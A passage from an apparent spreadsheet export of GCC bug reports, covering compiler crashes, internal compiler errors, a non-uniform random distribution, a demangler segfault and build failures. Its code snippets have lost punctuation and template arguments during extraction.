#20 0x000000000069722a in cgraph_finalize_compilation_unit () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1327
#21 0x0000000000574ee0 in c_write_global_declarations () at /mnt/svn/gcc-trunk/gcc/c-decl.c:10023
#22 0x00000000009d4924 in compile_file (argc=15 argv=0x7fffffffda98) at /mnt/svn/gcc-trunk/gcc/toplev.c:581
#23 do_compile (argc=15 argv=0x7fffffffda98) at /mnt/svn/gcc-trunk/gcc/toplev.c:1931
#24 toplev_main (argc=15 argv=0x7fffffffda98) at /mnt/svn/gcc-trunk/gcc/toplev.c:2007
#25 0x00007ffff6178d2d in __libc_start_main () from /lib64/libc.so.6
#26 0x0000000000558799 in _start ()
Tested revisions:
r181508 - crash
r181442 - crash
r180540 - OK
r178498 - OK</t>
  </si>
  <si>
    <t>GCC-44267</t>
  </si>
  <si>
    <t>SFINAE does not handle down static_cast over virtual inheritance</t>
  </si>
  <si>
    <t>g++ fails to overlook template instantiation errors involving down static_casts over virtual inheritance boundaries. Example:
struct B {}
struct D : B {}
struct VD : virtual B {}
template  T create()
typedef char one[1]
typedef char two[2]
template 
one
template 
two
int main()
{
   f(0)
   f(0)
   f(0)
   return 0
}
gives error: cannot convert from base â€˜Bâ€™ to derived type â€˜VDâ€™ via virtual base â€˜Bâ€™
Expected behavior is for template instantiation to fail for the first template f function and selection of the second template f function.  
Same issue for gcc 4.3.4.  
May be related to report 41468.</t>
  </si>
  <si>
    <t>cjoldfield</t>
  </si>
  <si>
    <t>GCC-33815</t>
  </si>
  <si>
    <t>tr1::uniform_int isn't uniform</t>
  </si>
  <si>
    <t>Consider:
#include 
#include 
#include 
#include 
void test ( unsigned int num_buckets unsigned int seed = 3141592 ) {
  std::cout &lt;&lt; using  &lt;&lt; num_buckets &lt;&lt;  buckets:\n
  std::tr1::mt19937 eng(seed)
  const unsigned long range = eng.max() / 5.5
  std::tr1::uniform_int rnd( 0 range )
  std::vector bucket ( num_buckets 0 )
  for ( unsigned int i = 0 i &lt; 1000000 ++i ) {
    ++bucket[ rnd(eng) / (range / num_buckets) ]
  }
  for ( unsigned int i = 0 i &lt; num_buckets ++i ) {
    std::cout &lt;&lt; i &lt;&lt; :  &lt;&lt; bucket[i] &lt;&lt; '\n'
  }
  std::cout &lt;&lt; '\n'
}
int main ( void ) {
  test( 2 )
  test( 3 )
  test( 4 )
  test( 6 )
  test( 10 )
  test( 20 )
  test( 30 )
  test( 40 )
}
It yields:
using 2 buckets.
0: 545389
1: 454611
using 3 buckets.
0: 363350
1: 333829
2: 302821
using 4 buckets.
0: 272507
1: 272882
2: 227489
3: 227122
using 6 buckets.
0: 181743
1: 181607
2: 182039
3: 151790
4: 151182
5: 151639
...
This doesn't look uniform. It looks more like the buckets in the
lower half get hit significantly more often.
Credit: This strange behavior had been reported by David Benbennick
to Boost long ago and was apparently never fixed.</t>
  </si>
  <si>
    <t>jkherciueh</t>
  </si>
  <si>
    <t>GCC-65743</t>
  </si>
  <si>
    <t>[5 regression] LTO+FDO build of Firefox crashes at startup</t>
  </si>
  <si>
    <t>I now get the following crash on LTO+FDO firefox:
Program received signal SIGSEGV Segmentation fault.
0x00007ffff4cc1a19 in xpc::XrayTraits::ensureHolder(JSContext* JS::Handle) () from /aux/hubicka/firefox6-50-lto-test6-fdo-hg80-b/dist/bin/libxul.so
(gdb) bt
#0  0x00007ffff4cc1a19 in xpc::XrayTraits::ensureHolder(JSContext* JS::Handle) () from /aux/hubicka/firefox6-50-lto-test6-fdo-hg80-b/dist/bin/libxul.so
#1  0x00007fff00000005 in ?? ()
#2  0x0000000000000000 in ?? ()
build by last week snapshot worked for me.  I am looking into the issue.</t>
  </si>
  <si>
    <t>GCC-70204</t>
  </si>
  <si>
    <t>[6 Regression] ICE on x86_64-linux-gnu in non_const_var_error at cp/constexpr.c:2764</t>
  </si>
  <si>
    <t>The following (invalid) code causes an ICE when compiled with the current GCC trunk on x86_64-linux-gnu in both 32-bit and 64-bit modes. 
This is a regression from 5.3.x. 
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 6.0.0 20160311 (experimental) [trunk revision 234134] (GCC) 
$ 
$ g++-5.3 -c small.cpp
small.cpp: In function â€˜void fn1()â€™:
small.cpp:7:9: error: â€˜yâ€™ cannot appear in a constant-expression
   fn1  ()
         ^
$ 
$ g++-trunk -c small.cpp
small.cpp: In function â€˜void fn1()â€™:
small.cpp:7:9: error: the value of â€˜yâ€™ is not usable in a constant expression
   fn1  ()
         ^
small.cpp:6:24: note: â€˜yâ€™ was not initialized with a constant expression
   const int x = I * a y = x
                        ^
small.cpp: In instantiation of â€˜void fn1() [with int N = 0 int I = 0]â€™:
small.cpp:13:17:   required from here
small.cpp:7:16: error: no matching function for call to â€˜fn1()â€™
   fn1  ()
   ~~~~~~~~~~~~~^~
small.cpp:4:6: note: candidate: template void fn1()
 void fn1 ()
      ^~~
small.cpp:4:6: note:   template argument deduction/substitution failed:
small.cpp:7:16: error: the value of â€˜yâ€™ is not usable in a constant expression
   fn1  ()
   ~~~~~~~~~~~~~^~
small.cpp:7:16: internal compiler error: in non_const_var_error at cp/constexpr.c:2764
0x8440c7 non_const_var_error
	../../gcc-source-trunk/gcc/cp/constexpr.c:2764
0x84e21d cxx_eval_constant_expression
	../../gcc-source-trunk/gcc/cp/constexpr.c:3336
0x84c9d0 cxx_eval_constant_expression
	../../gcc-source-trunk/gcc/cp/constexpr.c:3720
0x852c19 cxx_eval_outermost_constant_expr
	../../gcc-source-trunk/gcc/cp/constexpr.c:3939
0x6940a7 convert_nontype_argument
	../../gcc-source-trunk/gcc/cp/pt.c:6378
0x6940a7 convert_template_argument
	../../gcc-source-trunk/gcc/cp/pt.c:7254
0x6a05eb coerce_template_parms
	../../gcc-source-trunk/gcc/cp/pt.c:7715
0x6b90d1 fn_type_unification(tree_node* tree_node* tree_node* tree_node* const* unsigned int tree_node* unification_kind_t int bool bool)
	../../gcc-source-trunk/gcc/cp/pt.c:17625
0x61588b print_z_candidate
	../../gcc-source-trunk/gcc/cp/call.c:3440
0x6174f6 print_z_candidates
	../../gcc-source-trunk/gcc/cp/call.c:3510
0x621167 build_new_function_call(tree_node* vec** bool int)
	../../gcc-source-trunk/gcc/cp/call.c:4120
0x7bba69 finish_call_expr(tree_node* vec** bool bool int)
	../../gcc-source-trunk/gcc/cp/semantics.c:2453
0x68a3f6 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc-source-trunk/gcc/cp/pt.c:16623
0x67cddf tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc-source-trunk/gcc/cp/pt.c:15795
0x67d480 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc-source-trunk/gcc/cp/pt.c:15111
0x67c803 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc-source-trunk/gcc/cp/pt.c:15097
0x67e320 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc-source-trunk/gcc/cp/pt.c:15283
0x67a976 instantiate_decl(tree_node* int bool)
	../../gcc-source-trunk/gcc/cp/pt.c:22006
0x6c6c42 instantiate_pending_templates(int)
	../../gcc-source-trunk/gcc/cp/pt.c:22125
0x70a587 c_parse_final_cleanups()
	../../gcc-source-trunk/gcc/cp/decl2.c:4599
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
----------------------------------
int a
template 
void fn1 ()
{
  const int x = I * a y = x 
  fn1  ()
}
int 
main ()
{
  fn1  ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-51337</t>
  </si>
  <si>
    <t>SH Target: Various testsuite ICEs for -m2a -O0</t>
  </si>
  <si>
    <t>There are various testsuite ICEs for -m2a -mb -O0 which look similar to the following:
gcc.c-torture/compile/20000923-1.c:
...: error: insn does not satisfy its constraints:
(insn 142 34 35 (set (mem/c:SI (plus:SI (reg/f:SI 14 r14)
                (const_int 36 [0x24])) [0 %sfp+-16 S4 A32])
        (reg:SI 150 fpul)) ... {movsi_ie}
     (nil))
...: internal compiler error: in extract_constrain_insn_cached at recog.c:2052
The problem seems to be the movsi_ie insn for which reload thinks it is possible to load the FPUL register from a stack allocated reg using SImode displacement addressing which is actually not possible.
The following patch seems to help the issues...
--- gcc/config/sh/sh.c.orig    2011-11-28 10:03:04.000000000 +0900
+++ gcc/config/sh/sh.c    2011-11-28 15:09:01.000000000 +0900
@@ -124326 +1243210 @@ sh_secondary_reload (bool in_p rtx x r
   if (rclass != GENERAL_REGS &amp;&amp; REG_P (x)
       &amp;&amp; TARGET_REGISTER_P (REGNO (x)))
     return GENERAL_REGS
+  /* If here fall back to loading FPUL register through general regs. 
+     Happens when FPUL has to be loaded from a reg allocated on the stack.  */
+  if (rclass == FPUL_REGS &amp;&amp; !REG_P (x))
+    return GENERAL_REGS
   return NO_REGS
 }
However I think the following should be a better way to check the condition in question...
+  if (rclass == FPUL_REGS &amp;&amp; true_regnum (x) == -1)
+    return GENERAL_REGS
I'll submit a patch once testing is completed.</t>
  </si>
  <si>
    <t>oleg.endo</t>
  </si>
  <si>
    <t>GCC-82559</t>
  </si>
  <si>
    <t>[7 Regression] libgo bootstrap broken on at least alpha s390x</t>
  </si>
  <si>
    <t>see https://buildd.debian.org/status/package.php?p=gcc-7
seen on the gcc-7-branch 20171013 didn't check trunk yet.
this is at least broken on alpha and s390x.
sysinfo.go:7749:6: error: redefinition of 'PtraceRegs'
 type PtraceRegs struct { R0 uint64 R1 uint64 R2 uint64 R3 uint64 R4 uint64 R5 uint64 R6 uint64 R7 uint64 R8 uint64 R19 uint64 R20 uint64 R21 uint64 R22 uint64 R23 uint64 R24 uint64 R25 uint64 R26 uint64 R27 uint64 R28 uint64 Hae uint64 Trap_a0 uint64 Trap_a1 uint64 Trap_a2 uint64 Ps uint64 Pc uint64 Gp uint64 R16 uint64 R17 uint64 R18 uint64 }
      ^
../../../src/libgo/go/syscall/syscall_linux_alpha.go:11:6: note: previous definition of 'PtraceRegs' was here
 type PtraceRegs struct {
      ^
mv -f .deps/iparity_i16.Tpo .deps/iparity_i16.Plo
/bin/bash ./libtool  --tag=CC   --mode=compile /&gt;/build/./gcc/xgcc -B/&gt;/build/./gcc/ -B/usr/alpha-linux-gnu/bin/ -B/usr/alpha-linux-gnu/lib/ -isystem /usr/alpha-linux-gnu/include -isystem /usr/alpha-linux-gnu/sys-include -isystem /&gt;/build/sys-include    -DHAVE_CONFIG_H -I. -I../../../src/libgfortran  -iquote../../../src/libgfortran/io -I../../../src/libgfortran/../gcc -I../../../src/libgfortran/../gcc/config  -I../.././gcc -I../../../src/libgfortran/../libgcc -I../libgcc -I../../../src/libgfortran/../libbacktrace -I../libbacktrace -I../libbacktrace  -std=gnu11 -Wall -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wextra -Wwrite-strings -Werror=implicit-function-declaration -Werror=vla -fcx-fortran-rules -ffunction-sections -fdata-sections -mieee  -g -O2 -mieee -MT norm2_r4.lo -MD -MP -MF .deps/norm2_r4.Tpo -c -o norm2_r4.lo `test -f '../../../src/libgfortran/generated/norm2_r4.c' || echo '../../../src/libgfortran/'`../../../src/libgfortran/generated/norm2_r4.c
Makefile:3342: recipe for target 'syscall.lo' failed
make[6]: *** [syscall.lo] Error 1</t>
  </si>
  <si>
    <t>GCC-13409</t>
  </si>
  <si>
    <t>Internal Compiler Error: struct to enum redefinition.</t>
  </si>
  <si>
    <t>gcc version 2.95.4 20011002 (Debian prerelease)
and gcc version 3.3.1 and perhaps others in between
crash on this trivial code:
-------------------- cut-here ---------
struct A {
  struct B {
  }
}
int main()
{
  enum A::B
  return 0
}
----------- cut-here ----------</t>
  </si>
  <si>
    <t>dradivoj</t>
  </si>
  <si>
    <t>GCC-13206</t>
  </si>
  <si>
    <t>[3.4 Regression] libiberty cp-demangler segfaults</t>
  </si>
  <si>
    <t>The libiberty c++ demangler is used by gdb. The demangler appears to fail for
some mangled code. Compiled monotone (http://www.venge.net/monotone/) and boost
(http://www.boost.org/) as example to test out demangler with existing gcc 3.2.3
on RHEL 3.
Attempted to load the resulting monotone executable into gdb built from uberbaum
(checked out 2003/11/25 from :pserver:anoncvs@sources.redhat.com:/cvs/uberbaum).
When loading the monotone executable in gdb get segfault.
Program received signal SIGSEGV Segmentation fault.
0x08232dc7 in d_print_comp (dpi=0xbfffa3a0 dc=0x851cf1c)
    at ../../uber/libiberty/cp-demangle.c:2553
2553          if (dpi-&gt;buf[dpi-&gt;len - 1] == '&gt;')
Appears that demangler is dieing trying to demangle:
mangled=0xb6c95dce
_ZSt18uninitialized_copyIN9__gnu_cxx17__normal_iteratorIPSt4pairISsPFbP6sqlitePPcEESt6vectorIS9_SaIS9_EEEESE_ET0_T_SG_SF_
The stripped monotone is loaded okay by gdb.  Precompiled version of the code
for i386 are at http://people.redhat.com/wcohen/gdb_tuning/</t>
  </si>
  <si>
    <t>GCC-8901</t>
  </si>
  <si>
    <t>__WCHAR_MAX__ not defined correctly for -fshort-wchar</t>
  </si>
  <si>
    <t>__WCHAR_MAX__ incorrectly defined when -fshort-wchar is used.  It set to 32767 but a wchar_t is a short unsigned int (see __WCHAR_TYPE__) and the correct value for an unsigned short is 65535.
Release:
gcc version 3.3 20021209 (experimental)
Environment:
Sun Sparc Solaris 8
How-To-Repeat:
liza:~/test&gt; cat empty.cpp
int main()
{
        return 0
}
liza:~/test Yes Master? ~/gccsnap/gcctarget/bin/g++ -E -dM -fshort-wchar empty.cpp | grep -i wchar
#define __WCHAR_MAX__ 32767
#define __WCHAR_TYPE__ short unsigned int
#define __WCHAR_UNSIGNED__ 1</t>
  </si>
  <si>
    <t>cheinan</t>
  </si>
  <si>
    <t>GCC-2435</t>
  </si>
  <si>
    <t>GCC 3.0 20010326 emits duplicate template instantiations with -O</t>
  </si>
  <si>
    <t xml:space="preserve">	Compiling the included `session.i' file (a simplified part of
	GNU DDD) with `-O' optimization generates two superfluous
	template instantiations in the object file:
		$ c++ -O -c session.i nm session.o | c++filt | grep ' T '
		00000000 T lock_session_dir()
		00000270 T unlock_session_dir()
		00000220 T std::basic_ios &gt;::rdstate() const
		00000230 T std::basic_ios &gt;::clear(std::_Ios_Iostate)
		$ _
	This happens multiple times and thus breaks linkage due to
	multiple occurrences of the same symbol.
	Compiling without `-O' makes the problem go away:
		$ c++ -c session.i nm session.o | c++filt | grep ' T '
		00000000 T lock_session_dir()
		000000f0 T unlock_session_dir()
		$ _
Release:
3.0 20010326 (prerelease)
Environment:
System: Linux jamaica.fmi.uni-passau.de 2.2.17-14 #1 Mon Feb 5 18:48:50 EST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../egcs/configure --prefix=/public/packages/programming/gcc-current --enable-threads=posix --enable-shared --enable-languages=c++java --with-system-zlib --with-gxx-include-dir=/public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++
How-To-Repeat:
	Compile the included `session.i' file as described above.
# 29 /home/st/andreas/ddd/ddd/session.C
# 1 /home/st/andreas/ddd/ddd/strclass.h 1
# 409 /home/st/andreas/ddd/ddd/strclass.h
#pragma interface
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/iostream.h 1 3
# 31 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/iostream.h 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_iostream.h 1 3
# 38 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_iostream.h 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/i686-pc-linux-gnu/bits/c++config.h 1 3
# 34 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/i686-pc-linux-gnu/bits/c++config.h 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/i686-pc-linux-gnu/bits/os_defines.h 1 3
# 43 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/i686-pc-linux-gnu/bits/os_defines.h 3
# 1 /usr/include/features.h 1 3
# 250 /usr/include/features.h 3
# 1 /usr/include/sys/cdefs.h 1 3
# 251 /usr/include/features.h 2 3
# 278 /usr/include/features.h 3
# 1 /usr/include/gnu/stubs.h 1 3
# 279 /usr/include/features.h 2 3
# 44 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/i686-pc-linux-gnu/bits/os_defines.h 2 3
# 35 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/i686-pc-linux-gnu/bits/c++config.h 2 3
# 40 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_iostream.h 2 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_ostream.h 1 3
# 38 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_ostream.h 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_ios.h 1 3
# 38 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_ios.h 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_iosfwd.h 1 3
# 38 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_iosfwd.h 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/i686-pc-linux-gnu/bits/c++config.h 1 3
# 40 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_iosfwd.h 2 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cwchar.h 1 3
# 39 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cwchar.h 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/i686-pc-linux-gnu/bits/c++config.h 1 3
# 40 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cwchar.h 2 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstddef.h 1 3
# 40 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstddef.h 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include/stddef.h 1 3
# 147 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include/stddef.h 3
typedef int ptrdiff_t
# 199 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include/stddef.h 3
typedef unsigned int size_t
# 41 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstddef.h 2 3
namespace std
{
  using ::ptrdiff_t
  using ::size_t
}
# 41 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cwchar.h 2 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstdio.h 1 3
# 39 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstdio.h 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/i686-pc-linux-gnu/bits/c++config.h 1 3
# 40 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstdio.h 2 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstdarg.h 1 3
# 40 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstdarg.h 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include/stdarg.h 1 3
# 43 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include/stdarg.h 3
typedef __builtin_va_list __gnuc_va_list
# 110 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include/stdarg.h 3
typedef __gnuc_va_list va_list
# 41 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstdarg.h 2 3
namespace std
{
  using ::va_list
}
# 41 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstdio.h 2 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstddef.h 1 3
# 42 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstdio.h 2 3
# 44 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstdio.h 3
# 1 /usr/include/stdio.h 1 3
# 27 /usr/include/stdio.h 3
# 1 /usr/include/features.h 1 3
# 28 /usr/include/stdio.h 2 3
extern C {
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include/stddef.h 1 3
# 34 /usr/include/stdio.h 2 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include/stdarg.h 1 3
# 39 /usr/include/stdio.h 2 3
# 1 /usr/include/bits/types.h 1 3
# 26 /usr/include/bits/types.h 3
# 1 /usr/include/features.h 1 3
# 27 /usr/include/bits/types.h 2 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include/stddef.h 1 3
# 30 /usr/include/bits/types.h 2 3
typedef unsigned char __u_char
typedef unsigned short __u_short
typedef unsigned int __u_int
typedef unsigned long __u_long
__extension__ typedef unsigned long long int __u_quad_t
__extension__ typedef long long int __quad_t
# 49 /usr/include/bits/types.h 3
typedef signed char __int8_t
typedef unsigned char __uint8_t
typedef signed short int __int16_t
typedef unsigned short int __uint16_t
typedef signed int __int32_t
typedef unsigned int __uint32_t
__extension__ typedef signed long long int __int64_t
__extension__ typedef unsigned long long int __uint64_t
typedef __quad_t *__qaddr_t
typedef __u_quad_t __dev_t
typedef __u_int __uid_t
typedef __u_int __gid_t
typedef __u_long __ino_t
typedef __u_int __mode_t
typedef __u_int __nlink_t
typedef long int __off_t
typedef __quad_t __loff_t
typedef int __pid_t
typedef int __ssize_t
typedef long int __rlim_t
typedef __quad_t __rlim64_t
typedef __u_int __id_t
typedef struct
  {
    int __val[2]
  } __fsid_t
typedef int __daddr_t
typedef char *__caddr_t
typedef long int __time_t
typedef long int __swblk_t
typedef long int __clock_t
typedef unsigned long int __fd_mask
# 100 /usr/include/bits/types.h 3
typedef struct
  {
    __fd_mask fds_bits[1024 / (8 * sizeof (__fd_mask))]
  } __fd_set
typedef int __key_t
typedef unsigned short int __ipc_pid_t
typedef long int __blkcnt_t
typedef __quad_t __blkcnt64_t
typedef __u_long __fsblkcnt_t
typedef __u_quad_t __fsblkcnt64_t
typedef __u_long __fsfilcnt_t
typedef __u_quad_t __fsfilcnt64_t
typedef __u_long __ino64_t
typedef __loff_t __off64_t
typedef long int __t_scalar_t
typedef unsigned long int __t_uscalar_t
typedef int __intptr_t
# 1 /usr/include/bits/pthreadtypes.h 1 3
# 23 /usr/include/bits/pthreadtypes.h 3
# 1 /usr/include/bits/sched.h 1 3
# 68 /usr/include/bits/sched.h 3
struct __sched_param
  {
    int sched_priority
  }
# 24 /usr/include/bits/pthreadtypes.h 2 3
struct _pthread_fastlock
{
  long int __status
  int __spinlock
}
typedef struct _pthread_descr_struct *_pthread_descr
typedef struct
{
  int __detachstate
  int __schedpolicy
  struct __sched_param __schedparam
  int __inheritsched
  int __scope
  size_t __guardsize
  int __stackaddr_set
  void *__stackaddr
  size_t __stacksize
} pthread_attr_t
typedef struct
{
  struct _pthread_fastlock __c_lock
  _pthread_descr __c_waiting
} pthread_cond_t
typedef struct
{
  int __dummy
} pthread_condattr_t
typedef unsigned int pthread_key_t
typedef struct
{
  int __m_reserved
  int __m_count
  _pthread_descr __m_owner
  int __m_kind
  struct _pthread_fastlock __m_lock
} pthread_mutex_t
typedef struct
{
  int __mutexkind
} pthread_mutexattr_t
typedef int pthread_once_t
typedef struct _pthread_rwlock_t
{
  struct _pthread_fastlock __rw_lock
  int __rw_readers
  _pthread_descr __rw_writer
  _pthread_descr __rw_read_waiting
  _pthread_descr __rw_write_waiting
  int __rw_kind
  int __rw_pshared
} pthread_rwlock_t
typedef struct
{
  int __lockkind
  int __pshared
} pthread_rwlockattr_t
typedef unsigned long int pthread_t
# 151 /usr/include/bits/types.h 2 3
# 41 /usr/include/stdio.h 2 3
typedef struct _IO_FILE FILE
# 57 /usr/include/stdio.h 3
# 1 /usr/include/libio.h 1 3
# 30 /usr/include/libio.h 3
# 1 /usr/include/_G_config.h 1 3
# 9 /usr/include/_G_config.h 3
# 1 /usr/include/bits/types.h 1 3
# 10 /usr/include/_G_config.h 2 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include/stddef.h 1 3
# 312 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include/stddef.h 3
typedef unsigned int wint_t
# 15 /usr/include/_G_config.h 2 3
# 35 /usr/include/_G_config.h 3
typedef int _G_int16_t __attribute__ ((__mode__ (__HI__)))
typedef int _G_int32_t __attribute__ ((__mode__ (__SI__)))
typedef unsigned int _G_uint16_t __attribute__ ((__mode__ (__HI__)))
typedef unsigned int _G_uint32_t __attribute__ ((__mode__ (__SI__)))
# 31 /usr/include/libio.h 2 3
# 48 /usr/include/libio.h 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include/stdarg.h 1 3
# 49 /usr/include/libio.h 2 3
# 154 /usr/include/libio.h 3
struct _IO_jump_t struct _IO_FILE
# 164 /usr/include/libio.h 3
typedef void _IO_lock_t
struct _IO_marker {
  struct _IO_marker *_next
  struct _IO_FILE *_sbuf
  int _pos
# 187 /usr/include/libio.h 3
}
struct _IO_FILE {
  int _flags
  char* _IO_read_ptr
  char* _IO_read_end
  char* _IO_read_base
  char* _IO_write_base
  char* _IO_write_ptr
  char* _IO_write_end
  char* _IO_buf_base
  char* _IO_buf_end
  char *_IO_save_base
  char *_IO_backup_base
  char *_IO_save_end
  struct _IO_marker *_markers
  struct _IO_FILE *_chain
  int _fileno
  int _blksize
  __off_t _old_offset
  unsigned short _cur_column
  signed char _vtable_offset
  char _shortbuf[1]
  _IO_lock_t *_lock
# 233 /usr/include/libio.h 3
  __off64_t _offset
  int _unused2[16]
}
struct _IO_FILE_plus
extern struct _IO_FILE_plus _IO_2_1_stdin_
extern struct _IO_FILE_plus _IO_2_1_stdout_
extern struct _IO_FILE_plus _IO_2_1_stderr_
# 262 /usr/include/libio.h 3
typedef __ssize_t __io_read_fn (void * __cookie char *__buf size_t __nbytes)
# 271 /usr/include/libio.h 3
typedef __ssize_t __io_write_fn (void * __cookie __const char *__buf size_t __n)
# 280 /usr/include/libio.h 3
typedef int __io_seek_fn (void * __cookie __off_t __pos int __w)
typedef int __io_close_fn (void * __cookie)
typedef __io_read_fn cookie_read_function_t
typedef __io_write_fn cookie_write_function_t
typedef __io_seek_fn cookie_seek_function_t
typedef __io_close_fn cookie_close_function_t
typedef struct
{
  __io_read_fn *read
  __io_write_fn *write
  __io_seek_fn *seek
  __io_close_fn *close
} _IO_cookie_io_functions_t
typedef _IO_cookie_io_functions_t cookie_io_functions_t
struct _IO_cookie_file
{
  struct _IO_FILE __file
  const void *__vtable
  void *__cookie
  _IO_cookie_io_functions_t __io_functions
}
extern C {
extern int __underflow (_IO_FILE *) throw ()
extern int __uflow (_IO_FILE *) throw ()
extern int __overflow (_IO_FILE * int) throw ()
# 337 /usr/include/libio.h 3
extern int _IO_getc (_IO_FILE *__fp) throw ()
extern int _IO_putc (int __c _IO_FILE *__fp) throw ()
extern int _IO_feof (_IO_FILE *__fp) throw ()
extern int _IO_ferror (_IO_FILE *__fp) throw ()
extern int _IO_peekc_locked (_IO_FILE *__fp) throw ()
extern void _IO_flockfile (_IO_FILE *) throw ()
extern void _IO_funlockfile (_IO_FILE *) throw ()
extern int _IO_ftrylockfile (_IO_FILE *) throw ()
# 363 /usr/include/libio.h 3
extern int _IO_vfscanf (_IO_FILE * __restrict const char * __restrict __gnuc_va_list int *__restrict) throw ()
extern int _IO_vfprintf (_IO_FILE *__restrict const char *__restrict __gnuc_va_list) throw ()
extern __ssize_t _IO_padn (_IO_FILE * int __ssize_t) throw ()
extern size_t _IO_sgetn (_IO_FILE * void * size_t) throw ()
extern __off64_t _IO_seekoff (_IO_FILE * __off64_t int int) throw ()
